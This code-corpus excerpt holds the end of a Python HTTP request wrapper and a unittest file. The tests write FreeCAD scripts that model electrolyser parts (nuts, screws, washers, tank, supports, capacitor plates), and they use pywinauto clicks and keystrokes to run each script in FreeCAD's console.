    :return: the :class:`requests.Response` object, unmodified.
    """

    # Fallback timeout (seconds) applied when the caller passes timeout=None.
    default_timeout = 10

    def _timeout(self, timeout):
        # Use an explicit None check so a deliberate timeout=0 is honoured;
        # the previous `timeout or self.default_timeout` silently replaced 0.
        return self.default_timeout if timeout is None else timeout

    def post(self, url=None, data=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None):
        """Send an HTTP POST request and return the response."""
        return requests.post(url, data=data, params=params, headers=hdrs,
                             cookies=ck, auth=basic_auth,
                             timeout=self._timeout(timeout))

    def put(self, url=None, data=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None):
        """Send an HTTP PUT request and return the response."""
        return requests.put(url, data=data, params=params, headers=hdrs,
                            cookies=ck, auth=basic_auth,
                            timeout=self._timeout(timeout))

    def get(self, url=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None):
        """Send an HTTP GET request and return the response."""
        return requests.get(url, params=params, headers=hdrs,
                            cookies=ck, auth=basic_auth,
                            timeout=self._timeout(timeout))

    def delete(self, url, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None):
        """Send an HTTP DELETE request and return the response."""
        return requests.delete(url, params=params, headers=hdrs,
                               cookies=ck, auth=basic_auth,
                               timeout=self._timeout(timeout))

    def update(self, url, data=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None):
        """Alias for :meth:`put`, kept for backward compatibility.

        The original implementation duplicated ``put`` verbatim, so this
        now simply delegates to it.
        """
        return self.put(url, data=data, params=params, hdrs=hdrs, ck=ck,
                        basic_auth=basic_auth, timeout=timeout)
| 36.956522 | 106 | 0.644118 | 218 | 1,700 | 4.949541 | 0.192661 | 0.083411 | 0.064875 | 0.083411 | 0.826691 | 0.826691 | 0.826691 | 0.826691 | 0.826691 | 0.826691 | 0 | 0.006275 | 0.25 | 1,700 | 45 | 107 | 37.777778 | 0.84 | 0.06 | 0 | 0.521739 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.043478 | 0 | 0.565217 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
7d6bf1685cf3bbcf1db788f047d5eda98d7a445d | 34,729 | py | Python | Brevet_us_4_124_463_water_electrolyzer_2/unit_tests.py | Jay4C/Python-Macros-For_FreeCAD | 12ce5441a26731377fa43e86ccd2be675740d3a0 | [
"MIT"
] | null | null | null | Brevet_us_4_124_463_water_electrolyzer_2/unit_tests.py | Jay4C/Python-Macros-For_FreeCAD | 12ce5441a26731377fa43e86ccd2be675740d3a0 | [
"MIT"
] | null | null | null | Brevet_us_4_124_463_water_electrolyzer_2/unit_tests.py | Jay4C/Python-Macros-For_FreeCAD | 12ce5441a26731377fa43e86ccd2be675740d3a0 | [
"MIT"
] | null | null | null | import time
import unittest
import os
import pywinauto.mouse
import pywinauto.keyboard
class brevet_us_4_124_463_water_electrolyser_2_for_industrial_plant(unittest.TestCase):
# ok
def test_part_ecrou_5m(self):
print("test_part_ecrou_5m")
if os.path.exists("part_ecrou_5m.py"):
os.remove("part_ecrou_5m.py")
else:
print("The file does not exist")
# Writing to file
with open("part_ecrou_5m.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_ecrou_5m"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
cylinder_1 = Part.makeCylinder(4.5, 4)
cylinder_2 = Part.makeCylinder(2.5, 4)
cylinder_1 = cylinder_1.cut(cylinder_2)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_ecrou_5m").getObject("Shape"))
stl_file = u"part_ecrou_5m.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_ecrou_5m.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_ecrou_10m(self):
print("test_part_ecrou_10m")
if os.path.exists("part_ecrou_10m.py"):
os.remove("part_ecrou_10m.py")
else:
print("The file does not exist")
# Writing to file
with open("part_ecrou_10m.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_ecrou_10m"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
cylinder_1 = Part.makeCylinder(7.5, 4)
cylinder_2 = Part.makeCylinder(5, 4)
cylinder_1 = cylinder_1.cut(cylinder_2)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_ecrou_10m").getObject("Shape"))
stl_file = u"part_ecrou_10m.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_ecrou_10m.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_vis_metal_m5_20l(self):
print("test_part_vis_metal_m5_20l")
if os.path.exists("part_vis_metal_m5_20l.py"):
os.remove("part_vis_metal_m5_20l.py")
else:
print("The file does not exist")
# Writing to file
with open("part_vis_metal_m5_20l.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_vis_metal_m5_20l"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
cylinder_1 = Part.makeCylinder(6, 22)
cylinder_2 = Part.makeCylinder(2.5, 20)
cylinder_3 = Part.makeCylinder(6, 20)
# cylinder_3 cut by cylinder_2
cylinder_3 = cylinder_3.cut(cylinder_2)
# cylinder_1 cut by cylinder_3
cylinder_3_vector = FreeCAD.Vector(0, 0, 2)
cylinder_3.translate(cylinder_3_vector)
cylinder_1 = cylinder_1.cut(cylinder_3)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_vis_metal_m5_20l").getObject("Shape"))
stl_file = u"part_vis_metal_m5_20l.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_vis_metal_m5_20l.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_vis_metal_m10_200l(self):
print("test_part_vis_metal_m10_200l")
if os.path.exists("part_vis_metal_m10_200l.py"):
os.remove("part_vis_metal_m10_200l.py")
else:
print("The file does not exist")
# Writing to file
with open("part_vis_metal_m10_200l.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_vis_metal_m10_200l"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
cylinder_1 = Part.makeCylinder(8.5, 202)
cylinder_2 = Part.makeCylinder(5, 200)
cylinder_3 = Part.makeCylinder(8.5, 200)
# cylinder_3 cut by cylinder_2
cylinder_3 = cylinder_3.cut(cylinder_2)
# cylinder_1 cut by cylinder_3
cylinder_3_vector = FreeCAD.Vector(0, 0, 2)
cylinder_3.translate(cylinder_3_vector)
cylinder_1 = cylinder_1.cut(cylinder_3)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_vis_metal_m10_200l").getObject("Shape"))
stl_file = u"part_vis_metal_m10_200l.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_vis_metal_m10_200l.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_rondelle_m5_12d(self):
print("test_part_rondelle_m5_12d")
if os.path.exists("part_rondelle_m5_12d.py"):
os.remove("part_rondelle_m5_12d.py")
else:
print("The file does not exist")
# Writing to file
with open("part_rondelle_m5_12d.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_rondelle_m5_12d"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
cylinder_1 = Part.makeCylinder(6, 1)
cylinder_2 = Part.makeCylinder(2.5, 1)
cylinder_1 = cylinder_1.cut(cylinder_2)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_rondelle_m5_12d").getObject("Shape"))
stl_file = u"part_rondelle_m5_12d.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_rondelle_m5_12d.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_rondelle_m10_17d(self):
print("test_part_rondelle_m10_17d")
if os.path.exists("part_rondelle_m10_17d.py"):
os.remove("part_rondelle_m10_17d.py")
else:
print("The file does not exist")
# Writing to file
with open("part_rondelle_m10_17d.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_rondelle_m10_17d"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
cylinder_1 = Part.makeCylinder(8.5, 1)
cylinder_2 = Part.makeCylinder(5, 1)
cylinder_1 = cylinder_1.cut(cylinder_2)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_rondelle_m10_17d").getObject("Shape"))
stl_file = u"part_rondelle_m10_17d.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_rondelle_m10_17d.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_tank_d25(self):
print("test_part_tank_d25")
if os.path.exists("part_tank_d25.py"):
os.remove("part_tank_d25.py")
else:
print("The file does not exist")
# Writing to file
with open("part_tank_d25.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh, math
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_tank_d25"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
# Diametre maximal du tank
diametre_maximal = 250
cylinder_1 = Part.makeCylinder(diametre_maximal/2, diametre_maximal)
cylinder_2 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2, diametre_maximal)
# cylinder_1 cut by cylinder_2
cylinder_1 = cylinder_1.cut(cylinder_2)
cylinder_3 = Part.makeCylinder(diametre_maximal/2, diametre_maximal - 3*2)
cylinder_4 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3, diametre_maximal - 3*2)
# cylinder_3 cut by cylinder_4
cylinder_3 = cylinder_3.cut(cylinder_4)
# cylinder_1 cut by cylinder_3
cylinder_3_vector = FreeCAD.Vector(0, 0, 3)
cylinder_3.translate(cylinder_3_vector)
cylinder_1 = cylinder_1.cut(cylinder_3)
# holes for fixing the bottom support and the top support
degre = 10
for i in range(int(360/degre)):
radius = diametre_maximal/2 - 3 - 2.5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(2.5, diametre_maximal)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
cylinder_5 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2, 3)
cylinder_6 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2 - 3, 3)
# cylinder_5 cut by cylinder_6
cylinder_5 = cylinder_5.cut(cylinder_6)
# cylinder_1 cut by cylinder_5
cylinder_1 = cylinder_1.cut(cylinder_5)
cylinder_5_vector = FreeCAD.Vector(0, 0, diametre_maximal - 3)
cylinder_5.translate(cylinder_5_vector)
cylinder_1 = cylinder_1.cut(cylinder_5)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_tank_d25").getObject("Shape"))
stl_file = u"part_tank_d25.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_tank_d25.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
    def test_part_bottom_support_d25(self):
        """Generate `part_bottom_support_d25.py` (a FreeCAD script modelling the
        bottom support disc) and drive the FreeCAD GUI with pywinauto so that the
        script runs and exports `part_bottom_support_d25.stl`.

        NOTE(review): the click coordinates assume a fixed FreeCAD window layout
        and screen resolution — confirm on the target machine.
        """
        print("test_part_bottom_support_d25")
        # Delete any stale script from a previous run before rewriting it.
        if os.path.exists("part_bottom_support_d25.py"):
            os.remove("part_bottom_support_d25.py")
        else:
            print("The file does not exist")
        # Writing to file
        with open("part_bottom_support_d25.py", "w") as file:
            # Writing data to a file
            file.write("""import FreeCAD, Part, Mesh, math
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_bottom_support_d25"
def clear_doc():
    # Clear the active document deleting all the objects
    for obj in DOC.Objects:
        DOC.removeObject(obj.Name)
def setview():
    # Rearrange View
    FreeCAD.Gui.SendMsgToActiveView("ViewFit")
    FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
    FreeCAD.newDocument(DOC_NAME)
    FreeCAD.setActiveDocument(DOC_NAME)
    DOC = FreeCAD.activeDocument()
else:
    clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
# Diametre maximal
diametre_maximal = 250
cylinder_1 = Part.makeCylinder(diametre_maximal/2, 6)
cylinder_2 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2 - 3, 3)
# cylinder_1 cut by cylinder_2
cylinder_2_vector = FreeCAD.Vector(0, 0, 3)
cylinder_2.translate(cylinder_2_vector)
cylinder_1 = cylinder_1.cut(cylinder_2)
cylinder_3 = Part.makeCylinder(diametre_maximal/2, 3)
cylinder_4 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2, 3)
# cylinder_3 cut by cylinder_4
cylinder_3 = cylinder_3.cut(cylinder_4)
# cylinder_1 cut by cylinder_3
cylinder_3_vector = FreeCAD.Vector(0, 0, 3)
cylinder_3.translate(cylinder_3_vector)
cylinder_1 = cylinder_1.cut(cylinder_3)
# holes for fixing the tank
degre = 10
for i in range(int(360/degre)):
    radius = diametre_maximal/2 - 3 - 2.5
    alpha=(i*degre*math.pi)/180
    hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
    hole = Part.makeCylinder(2.5, 3)
    hole.translate(hole_vector)
    cylinder_1 = cylinder_1.cut(hole)
# holes for fixing the anodes and the cathodes
degre = 60
for i in range(int(360/degre)):
    radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
    alpha=(i*degre*math.pi)/180
    hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
    hole = Part.makeCylinder(5, 3)
    hole.translate(hole_vector)
    cylinder_1 = cylinder_1.cut(hole)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_bottom_support_d25").getObject("Shape"))
stl_file = u"part_bottom_support_d25.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
        # GUI automation: focus FreeCAD, open its Python console, and run the script.
        time.sleep(3)
        pywinauto.mouse.click(button="left", coords=(460, 750))
        time.sleep(3)
        pywinauto.mouse.click(button="left", coords=(70, 670))
        time.sleep(3)
        pywinauto.keyboard.send_keys(
            'exec{(}open{(}"part_bottom_support_d25.py"{)}.read{(}{)}{)}'
        )
        time.sleep(3)
        pywinauto.keyboard.send_keys('{ENTER}')
# ok
    def test_part_top_support_d25(self):
        """Generate `part_top_support_d25.py` (a FreeCAD script modelling the top
        support disc, including holes for the volume sensor, water input, gas
        output and pressure sensor) and run it through the FreeCAD GUI via
        pywinauto, exporting `part_top_support_d25.stl`.

        NOTE(review): click coordinates assume a fixed FreeCAD window layout.
        """
        print("test_part_top_support_d25")
        # Delete any stale script from a previous run before rewriting it.
        if os.path.exists("part_top_support_d25.py"):
            os.remove("part_top_support_d25.py")
        else:
            print("The file does not exist")
        # Writing to file
        with open("part_top_support_d25.py", "w") as file:
            # Writing data to a file
            file.write("""import FreeCAD, Part, Mesh, math
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_top_support_d25"
def clear_doc():
    # Clear the active document deleting all the objects
    for obj in DOC.Objects:
        DOC.removeObject(obj.Name)
def setview():
    # Rearrange View
    FreeCAD.Gui.SendMsgToActiveView("ViewFit")
    FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
    FreeCAD.newDocument(DOC_NAME)
    FreeCAD.setActiveDocument(DOC_NAME)
    DOC = FreeCAD.activeDocument()
else:
    clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
# Diametre maximal
diametre_maximal = 250
cylinder_1 = Part.makeCylinder(diametre_maximal/2, 6)
cylinder_2 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2 - 3, 3)
# cylinder_1 cut by cylinder_2
cylinder_2_vector = FreeCAD.Vector(0, 0, 3)
cylinder_2.translate(cylinder_2_vector)
cylinder_1 = cylinder_1.cut(cylinder_2)
cylinder_3 = Part.makeCylinder(diametre_maximal/2, 3)
cylinder_4 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2, 3)
# cylinder_3 cut by cylinder_4
cylinder_3 = cylinder_3.cut(cylinder_4)
# cylinder_1 cut by cylinder_3
cylinder_3_vector = FreeCAD.Vector(0, 0, 3)
cylinder_3.translate(cylinder_3_vector)
cylinder_1 = cylinder_1.cut(cylinder_3)
# holes for fixing the tank
degre = 10
for i in range(int(360/degre)):
    radius = diametre_maximal/2 - 3 - 2.5
    alpha=(i*degre*math.pi)/180
    hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
    hole = Part.makeCylinder(2.5, 3)
    hole.translate(hole_vector)
    cylinder_1 = cylinder_1.cut(hole)
cylinder_5 = Part.makeCylinder(4, 3)
# cylinder_1 cut by cylinder_5 for fixing the volume sensor
cylinder_1 = cylinder_1.cut(cylinder_5)
# holes for the water input, the gas output, the pressure sensor
degre = 120
for i in range(int(360/degre)):
    radius = diametre_maximal/4
    alpha=(i*degre*math.pi)/180
    hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
    hole = Part.makeCylinder(8, 3)
    hole.translate(hole_vector)
    cylinder_1 = cylinder_1.cut(hole)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_top_support_d25").getObject("Shape"))
stl_file = u"part_top_support_d25.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
        # GUI automation: focus FreeCAD, open its Python console, and run the script.
        time.sleep(3)
        pywinauto.mouse.click(button="left", coords=(460, 750))
        time.sleep(3)
        pywinauto.mouse.click(button="left", coords=(70, 670))
        time.sleep(3)
        pywinauto.keyboard.send_keys(
            'exec{(}open{(}"part_top_support_d25.py"{)}.read{(}{)}{)}'
        )
        time.sleep(3)
        pywinauto.keyboard.send_keys('{ENTER}')
# ok
    def test_part_capacitor_plate(self):
        """Generate `part_capacitor_plate.py` (a FreeCAD script modelling one
        perforated capacitor plate) and run it through the FreeCAD GUI via
        pywinauto, exporting `part_capacitor_plate.stl`.

        NOTE(review): click coordinates assume a fixed FreeCAD window layout.
        """
        print("test_part_capacitor_plate")
        # Delete any stale script from a previous run before rewriting it.
        if os.path.exists("part_capacitor_plate.py"):
            os.remove("part_capacitor_plate.py")
        else:
            print("The file does not exist")
        # Writing to file
        with open("part_capacitor_plate.py", "w") as file:
            # Writing data to a file
            file.write("""import FreeCAD, Part, Mesh, math
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_capacitor_plate"
def clear_doc():
    # Clear the active document deleting all the objects
    for obj in DOC.Objects:
        DOC.removeObject(obj.Name)
def setview():
    # Rearrange View
    FreeCAD.Gui.SendMsgToActiveView("ViewFit")
    FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
    FreeCAD.newDocument(DOC_NAME)
    FreeCAD.setActiveDocument(DOC_NAME)
    DOC = FreeCAD.activeDocument()
else:
    clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
# Diametre maximal du tank
diametre_maximal_tank = 250
# Diametre maximal du capacitor plate
diametre_maximal_capacitor_plate = diametre_maximal_tank - 3*2 - 5*2 - 3*2 - 2*2 - 3*2 - 2*2 - 2*2
cylinder_1 = Part.makeCylinder(diametre_maximal_capacitor_plate/2, 1)
cylinder_2 = Part.makeCylinder(5, 1)
cylinder_1 = cylinder_1.cut(cylinder_2)
# holes for fixing the anodes
degre = 120
for i in range(int(360/degre)):
    radius = diametre_maximal_capacitor_plate/2 - 4 - 5
    alpha=(i*degre*math.pi)/180
    hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
    hole = Part.makeCylinder(5, 1)
    hole.translate(hole_vector)
    cylinder_1 = cylinder_1.cut(hole)
# holes for fixing the cathodes
degres = [60, 180, 300]
for degre in degres:
    radius = diametre_maximal_capacitor_plate/2
    alpha=(degre*math.pi)/180
    hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
    hole = Part.makeCylinder(15.5, 1)
    hole.translate(hole_vector)
    cylinder_1 = cylinder_1.cut(hole)
# holes for letting the gas mixture to go out
degre = 10
for i in range(int(360/degre)):
    radius = diametre_maximal_capacitor_plate/2 - 4 - 5
    alpha=(i*degre*math.pi)/180
    hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
    hole = Part.makeCylinder(2.5, 1)
    hole.translate(hole_vector)
    cylinder_1 = cylinder_1.cut(hole)
# holes for letting the gas mixture to go out
degre = 90
for i in range(int(360/degre)):
    radius = 20
    alpha=(i*degre*math.pi)/180
    hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
    hole = Part.makeCylinder(5, 1)
    hole.translate(hole_vector)
    cylinder_1 = cylinder_1.cut(hole)
# holes for letting the gas mixture to go out
degre = 30
for i in range(int(360/degre)):
    for i_1 in range(2, 5):
        radius = 20 * i_1
        alpha=(i*degre*math.pi)/180
        hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
        hole = Part.makeCylinder(5, 1)
        hole.translate(hole_vector)
        cylinder_1 = cylinder_1.cut(hole)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_capacitor_plate").getObject("Shape"))
stl_file = u"part_capacitor_plate.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
        # GUI automation: focus FreeCAD, open its Python console, and run the script.
        time.sleep(3)
        pywinauto.mouse.click(button="left", coords=(460, 750))
        time.sleep(3)
        pywinauto.mouse.click(button="left", coords=(70, 670))
        time.sleep(3)
        pywinauto.keyboard.send_keys(
            'exec{(}open{(}"part_capacitor_plate.py"{)}.read{(}{)}{)}'
        )
        time.sleep(3)
        pywinauto.keyboard.send_keys('{ENTER}')
# ok
    def test_assembly(self):
        """Generate `assembly.py` (a FreeCAD script that rebuilds the bottom
        support and stacks washers, screws, nuts and capacitor plates on it)
        and run it through the FreeCAD GUI via pywinauto.

        NOTE(review): the generated script uses `App` and `FreeCADGui` without
        importing them — presumably they are pre-bound in FreeCAD's Python
        console namespace; confirm it is always run from the console.  It also
        expects the .stl files produced by the other tests to already exist.
        """
        print("test_assembly")
        # Delete any stale script from a previous run before rewriting it.
        if os.path.exists("assembly.py"):
            os.remove("assembly.py")
        else:
            print("The file does not exist")
        # Writing to file
        with open("assembly.py", "w") as file:
            # Writing data to a file
            file.write("""import FreeCAD, Part, Mesh, math
DOC = FreeCAD.activeDocument()
DOC_NAME = "assembly"
def clear_doc():
    # Clear the active document deleting all the objects
    for obj in DOC.Objects:
        DOC.removeObject(obj.Name)
def setview():
    # Rearrange View
    FreeCAD.Gui.SendMsgToActiveView("ViewFit")
    FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
    FreeCAD.newDocument(DOC_NAME)
    FreeCAD.setActiveDocument(DOC_NAME)
    DOC = FreeCAD.activeDocument()
else:
    clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
# Diametre maximal
diametre_maximal = 250
cylinder_1 = Part.makeCylinder(diametre_maximal/2, 6)
cylinder_2 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2 - 3, 3)
# cylinder_1 cut by cylinder_2
cylinder_2_vector = FreeCAD.Vector(0, 0, 3)
cylinder_2.translate(cylinder_2_vector)
cylinder_1 = cylinder_1.cut(cylinder_2)
cylinder_3 = Part.makeCylinder(diametre_maximal/2, 3)
cylinder_4 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2, 3)
# cylinder_3 cut by cylinder_4
cylinder_3 = cylinder_3.cut(cylinder_4)
# cylinder_1 cut by cylinder_3
cylinder_3_vector = FreeCAD.Vector(0, 0, 3)
cylinder_3.translate(cylinder_3_vector)
cylinder_1 = cylinder_1.cut(cylinder_3)
# holes for fixing the tank
degre = 10
for i in range(int(360/degre)):
    radius = diametre_maximal/2 - 3 - 2.5
